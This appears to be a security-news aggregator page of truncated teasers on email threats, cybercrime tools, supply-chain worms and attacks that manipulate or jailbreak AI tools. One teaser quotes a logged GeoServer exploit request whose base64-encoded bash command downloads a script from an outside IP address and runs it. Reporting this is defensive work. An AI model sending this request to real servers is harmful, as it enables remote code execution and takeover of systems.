Email threat landscape: Q2 2026 trends and insights
In this article The second quarter of 2026 (April–June) was largely defined by the continuing downstream effects following Microsoft’s Digital […]
In this article The second quarter of 2026 (April–June) was largely defined by the continuing downstream effects following Microsoft’s Digital […]
Varonis Threat Labs discovered Dolphin X advertised on a cybercrime forum by a vendor using the alias “Kontraktnik.”
This isn’t a new attack, but something I saw “pop-up” in our logs this week: GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo%7D%7C%7Bbase64%2C-d%7D%7Csh%27) HTTP/1.1 Host:
AI is absorbing the volume work that makes up the fundamental architecture of the Security Operations Center (SOC) tier system.
Threat actors are using a new technique called “phantom squatting” to trick AI tools into directing users to phishing sites,
Cyber incidents don’t wait—and effective response can’t either. In the age of AI where cyber incidents unfold at machine speed,
Recently, our teams in Latin America investigated a series of incidents involving misconfiguration, the deployment of BitLocker, and the exploitation
In February 2026, Socket.dev published research on a multi-stage npm supply chain worm operating under the internal flag SANDWORM_MODE. The
A new report from the Government Accounting Office reveals that the Department of Homeland Security (DHS) plans to nearly triple
A Russian-speaking cyber-criminal has been observed moving in three months from posting a jailbreak tutorial on a Russian-language forum to